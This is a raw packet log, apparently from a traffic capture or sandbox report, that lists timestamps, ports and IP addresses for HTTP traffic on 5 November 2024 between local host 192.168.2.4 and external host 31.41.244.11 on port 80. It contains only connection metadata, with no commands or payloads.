Nov 5, 2024 18:46:09.688515902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.688525915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.688536882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.688560009 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.688580036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.688581944 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.688589096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.688610077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.688616991 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.688646078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.688687086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.688697100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.688705921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.688725948 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.688754082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.689006090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689028025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689039946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689044952 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.689059973 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.689080954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.689130068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689140081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689150095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689163923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.689194918 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.689245939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689255953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689265966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689290047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.689306974 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.689311028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689321041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689347029 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.689400911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689410925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689419985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689431906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689441919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.689461946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.689470053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689480066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689507961 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.689559937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689570904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689580917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689590931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689590931 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.689600945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689621925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.689651012 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.689821005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689830065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689836979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689861059 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.689863920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689874887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689882040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.689883947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.689910889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.689927101 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.690536022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.690551996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.690562963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.690597057 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.690619946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.690632105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.690642118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.690655947 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.690681934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.690752983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.690790892 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.690803051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.690813065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.690844059 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.690882921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.690892935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.690903902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.690918922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.690954924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.690979958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.690989971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.690999031 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.691009045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.691020012 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.691039085 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.691092968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.691111088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.691133022 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.691159964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.691160917 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.691174030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.691198111 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.691215992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.691220999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.691226959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.691237926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.691253901 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.691277027 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.691725016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.691742897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.691752911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.691780090 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.691802025 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.691824913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.691836119 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.691848993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.691864967 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.691884041 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.691910982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.691920996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.691926956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.691953897 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.691963911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.691977978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.692003965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.692019939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.692030907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.692032099 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.692056894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.692079067 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.692704916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.692723036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.692733049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.692747116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.692771912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.692794085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.692804098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.692837000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.692840099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.692861080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.692872047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.692874908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.692909002 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.692914963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.692953110 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.692972898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.692982912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693008900 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.693031073 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.693058014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693068027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693078041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693089008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693094969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.693100929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693123102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.693146944 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.693219900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693259954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.693268061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693279028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693305016 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.693372965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693382978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693397999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693404913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.693407059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693416119 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693425894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693439960 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.693470001 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.693480968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693490982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693520069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693521976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.693530083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693542004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693552971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693556070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.693588972 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.693618059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693627119 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693635941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693648100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693655968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.693659067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693676949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.693696022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693706036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693710089 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.693717003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.693742037 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.693763971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.710458994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710473061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710484982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710514069 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.710540056 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.710556030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710565090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710582018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710586071 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.710592031 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710602999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710607052 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.710629940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.710655928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.710721016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710732937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710741043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710752964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710757971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.710788965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.710810900 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.710817099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710825920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710834980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710844994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710855007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710860968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.710869074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.710899115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.710916042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710927010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710936069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710953951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.710963964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710973978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710982084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.710983038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.710994005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711003065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711038113 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711062908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711076975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711097956 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711118937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711128950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711132050 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711138010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711147070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711153984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711179018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711198092 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711213112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711221933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711252928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711266041 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711405993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711424112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711431980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711448908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711466074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711502075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711513042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711518049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711540937 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711550951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711577892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711580038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711587906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711604118 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711611032 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711635113 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711663961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711674929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711685896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711699963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711705923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711713076 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711719036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711729050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711735010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711743116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711756945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711765051 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711767912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711790085 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711818933 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.711832047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.711867094 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712049961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712059975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712069035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712088108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712110996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712218046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712254047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712268114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712279081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712311029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712311983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712321997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712331057 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712335110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712338924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712346077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712357998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712372065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712378025 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712410927 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712474108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712483883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712498903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712510109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712517023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712519884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712522030 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712543011 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712551117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712560892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712568998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712577105 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712578058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712594032 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712624073 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712661982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712671995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712683916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712693930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712702036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712726116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712766886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712775946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712785006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712795973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712805033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712810040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712836027 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712862015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712863922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712876081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712884903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712902069 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712927103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.712955952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712965965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712975025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712985039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712994099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.712999105 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713025093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713046074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713066101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713105917 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713130951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713140965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713150024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713164091 CET	80	49804	31.41.244.11	192.168.2.4
